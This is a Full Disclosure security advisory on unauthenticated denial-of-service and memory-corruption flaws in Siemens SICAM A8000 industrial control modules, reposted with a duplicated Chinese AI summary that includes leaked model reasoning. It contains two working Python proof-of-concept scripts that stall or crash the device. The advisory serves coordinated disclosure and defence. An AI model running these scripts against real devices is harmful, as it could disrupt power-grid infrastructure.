CyberDanube Security Research 20260408-1 | Multiple Vulnerabilities in Siemens SICAM A8000
嗯,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,找出关键信息。 文章主要讲的是西门子SICAM A8000设备的多个漏洞。漏洞包括未认证的拒绝服务和内存破坏,影响版本是V25.30及以下。修复版本是V26.10,CVE编号是CVE-2026-27664。漏洞可能造成设备崩溃或代码执行。 接下来,我需要把这些信息浓缩到100字以内。要注意不要遗漏关键点:产品名称、漏洞类型、影响版本、修复版本和CVE编号,以及可能的影响。 可能的结构是:产品名称、漏洞类型、影响版本、CVE编号、修复建议和影响结果。这样既简洁又全面。 最后,检查字数是否符合要求,并确保语言流畅自然。 </think> 西门子SICAM A8000设备存在多个高危漏洞,包括未认证拒绝服务和内存破坏(CVE-2026-27664),影响版本<=V25.30。攻击者可通过恶意请求导致设备崩溃或远程代码执行。建议升级至V26.10并限制网络访问以缓解风险。 2026-4-14 17:7:22 Author: seclists.org(查看原文) 阅读量:8 收藏
嗯,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,找出关键信息。 文章主要讲的是西门子SICAM A8000设备的多个漏洞。漏洞包括未认证的拒绝服务和内存破坏,影响版本是V25.30及以下。修复版本是V26.10,CVE编号是CVE-2026-27664。漏洞可能造成设备崩溃或代码执行。 接下来,我需要把这些信息浓缩到100字以内。要注意不要遗漏关键点:产品名称、漏洞类型、影响版本、修复版本和CVE编号,以及可能的影响。 可能的结构是:产品名称、漏洞类型、影响版本、CVE编号、修复建议和影响结果。这样既简洁又全面。 最后,检查字数是否符合要求,并确保语言流畅自然。 </think> 西门子SICAM A8000设备存在多个高危漏洞,包括未认证拒绝服务和内存破坏(CVE-2026-27664),影响版本<=V25.30。攻击者可通过恶意请求导致设备崩溃或远程代码执行。建议升级至V26.10并限制网络访问以缓解风险。 2026-4-14 17:7:22 Author: seclists.org(查看原文) 阅读量:8 收藏
Full Disclosure mailing list archives
From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 14 Apr 2026 10:45:01 +0000
CyberDanube Security Research 20260408-1
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Siemens SICAM A8000 CP-8050/CP-8031/CP-8010/CP-8012
vulnerable version| <=V25.30
fixed version| V26.10
CVE number| CVE-2026-27664
impact| High
homepage| https://siemens.com/
found| 18.12.2025
by| S. Dietz
| (Office Vienna)
| CyberDanube Security Research
| Vienna
|
| This research was conducted in cooperation with
| VERBUND Digital Power during a penetration test.
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"Our purpose: We create technology to transform the everyday, for everyone.
By combining the real and the digital worlds, we can help accelerate both
digitalization and sustainability - so our customers around the world can
become more competitive, resilient and sustainable."
Source: https://www.siemens.com/global/en/company/about.html
Vulnerable versions
-------------------------------------------------------------------------------
Siemens SICAM A8000 CP-8050 Master Module (6MF2805-0AA00) / <=V25.30
Siemens SICAM A8000 CP-8031 Master Module (6MF2803-1AA00) / <=V25.30
Siemens SICAM A8000 CP-8010 Master Module (6MF2801-0AA00) / <=V25.31
Siemens SICAM A8000 CP-8012 Master Module (6MF2801-2AA00) / <=V25.31
See also the vendor advisory:
https://cert-portal.siemens.com/productcert/html/ssa-246443.html
Vulnerability overview
-------------------------------------------------------------------------------
1) Unauthenticated Denial of Service
A crafted POST request with a large Content-Length and multipart boundary
without matching body seems to make the parser wait for more data. As long as
the connection is open, no other user can interact with the service. IHI00.elf
and RTUM85.elf are impacted by this.
2) Unauthenticated Memory Corruption (CVE-2026-27664)
A crafted POST request with a malicious XML body can be send to write null
bytes to an arbitrary memory address after the buffers location. This may lead
to a denial of service or remote code execution. This impacts the IHI00.elf as
well as the RTUM85.elf binary.
Proof of Concept
-------------------------------------------------------------------------------
1) Unauthenticated Denial of Service
The following python script can be used to temporarily impact the availability
of the device.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/env python3
# S. Dietz <fitfrost4>
from pwn import *
IP = "localhost"
PORT = 8080
COMP = "ihi"
path = b""
if args.IP:
IP = args.IP
if args.PORT:
PORT = int(args.PORT)
if args.COMP:
COMP = args.COMP
if COMP == "rtum85":
path = b"/sicweb-ajax/rtum85/pwned"
elif COMP == "ihi":
path = b"/sicweb-ajax/auth"
req = b""
req += b"POST " + path + b" HTTP/1.1\r\n"
req += b"Content-Length: " + str(13371337).encode() + b"\r\n"
req += b"Content-Type: multipart/form-data; boundary=--pwned\r\n"
req += b"User-Agent: Mozilla/5.0\r\n"
req += b"Accept: */*\r\n"
req += b"Accept-Encoding: gzip, deflate, br\r\n"
req += b"Connection: keep-alive\r\n"
req += b"\r\n"
log.info(req)
with remote(IP, PORT) as io:
io.send(req)
io.recv(1337)
-------------------------------------------------------------------------------
2) Unauthenticated Memory Corruption (CVE-2026-27664)
The following python script can be used to crash the IHI00.elf application on
the device. As a watchdog (ISV00.elf) is active, the device reboots.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/env python3
# S. Dietz <fitfrost4>
from pwn import *
IP = "localhost"
PORT = 8080
if args.IP:
IP = args.IP
if args.PORT:
PORT = int(args.PORT)
buf = b'<?xml version="1.0" encoding="UTF-8"?>\n'
buf += b"<x>" * 0xa0000
buf += b"</x>"
buf += b"\r\n"
body = buf
req = b""
req += b"POST /sicweb-ajax/auth HTTP/1.1\r\n"
req += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
req += b"sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"\r\n"
req += b"Content-Type: application/xml\r\n"
req += b"User-Agent: Mozilla/5.0\r\n"
req += b"Accept: */*\r\n"
req += b"Accept-Encoding: gzip, deflate, br\r\n"
req += b"Connection: keep-alive\r\n"
req += b"\r\n"
req += body
with remote(IP, PORT) as io:
io.send(req)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The issue arises due to a logic error in the XML parsing. Both binaries use
libexpat which export the function XML_SetElementHandler() which takes a
user-defined structure as well as two function pointer which are executed when
an opening or closing tag occurs. When looking at start() it can be observed
that the tag_depth is tracked. If the depth is greater than 15, the return
value gets set to -2 and the tag_depth gets incremented.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0052b0d4 void start(struct userdata* userData, char const* xmlchar)
0052b0da int32_t tag_depth = userData->tag_depth
0052b0e2 int32_t* entry_r2
0052b0e2
0052b0e2 if (tag_depth != 0)
0052b0e6 if (tag_depth != 1)
0052b0fa if (tag_depth u> 0xf)
0052b0fa goto too_big
[...]
0052b152 too_big:
0052b152 userData->retval = -2
0052b154 userData->tag_depth = tag_depth + 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When a matching closing tag occurs, end() is executed. Due to a missing retval
check, the userData access happens out-of-bounds resulting in an arbitrary
null-byte overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0052a570 void end(struct userdata* userData, char const* xmlchar)
[...]
0052a584
0052a588 int32_t tag_depth = userData->tag_depth
0052a58c userData->tag_depth = tag_depth - 1
0052a58c
0052a58e if (tag_depth != 1)
0052a598 *(userData + ((tag_depth - 2) << 2) + 4) = 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Further investigations showed that the bug allows an attacker to write a word
of null-bytes to arbitrary memory after the buffers location, including the
stack. Due to the extensive usage of shared libraries, this results in a large
attack surface.
-------------------------------------------------------------------------------
Solution
-------------------------------------------------------------------------------
Install the latest version available.
Workaround
-------------------------------------------------------------------------------
Restrict network access to the device in the infrastructure.
Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends to perform a white-box security assessment of the SICAM
A8000 master module devices.
Contact Timeline
-------------------------------------------------------------------------------
2026-02-24: Contacting Siemens ProductCERT
2026-03-04: Siemens ProductCERT confirmed the issue but said the the DoS is a
valid behavior for resource conservation.
2026-03-09: Asking for name and organization for acknowledgement. In addition,
gave an estimation regarding the update timeline.
2026-03-26: Siemens ProductCERT publishes the advisory SSA-246443.
2026-04-08: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Dietz / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- CyberDanube Security Research 20260408-1 | Multiple Vulnerabilities in Siemens SICAM A8000 Thomas Weber | CyberDanube via Fulldisclosure (Apr 14)
文章来源: https://seclists.org/fulldisclosure/2026/Apr/7
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh